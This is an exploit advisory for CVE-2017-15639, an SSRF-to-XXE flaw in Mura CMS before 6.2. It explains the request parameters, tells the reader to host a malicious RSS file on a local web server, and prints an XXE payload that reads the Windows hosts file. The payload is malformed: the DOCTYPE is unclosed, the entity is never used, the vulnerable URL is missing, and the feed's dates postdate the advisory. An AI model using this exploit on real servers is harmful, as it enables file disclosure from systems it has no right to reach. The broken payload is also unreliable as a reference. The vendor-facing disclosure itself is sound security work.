Mura CMS < 6.2 - Server-Side Request Forgery / XML External Entity Injection







# Exploit Title: Mura CMS before 6.2 SSRF + XXE
# Date: 30-10-2017
# Exploit Author: Anthony Cole
# Vendor Homepage:
# Version: before 6.2
# Contact:
# Website:
# Tested on: Windows 2008 w/ Coldfusion 8
# CVE: CVE-2017-15639
# Category: webapps
1. Description
Any user can cause Mura CMS before version 6.2 to make a http request.  As an added bonus, the response from that HTTP GET request is passed directly to XmlParse().  It is possible to read a file from the file system using an XXE attack.
2. Proof of Concept

vulnerable file is on github, line 50:

Explanation of params
	siteid - The siteid can be obtained by viewing the html source code of the target home page and searching "siteid".
	rssurl - This is the URL you want Mura CMS to call out to.
To perform a XXE attack, you will need to stand up a web server: python -m SimpleHTTPServer 80
Then create a file:

<?xml version="1.0" ?>
<!DOCTYPE rss [
        <!ENTITY send SYSTEM "file:///c:\Windows\System32\drivers\etc\hosts">

<rss version="2.0">
        <pubDate>Thu, 28 Sep 2018 11:55:19 -0700</pubDate>
                <title>Item title</title>
                <guid isPermaLink="false">00000000-0000-0000-0000000000000000</guid>
                <pubDate>Thu, 21 Sep 2018 00:00:01 -0700</pubDate>
3. Solution:

delete readRSS.cfm from the server.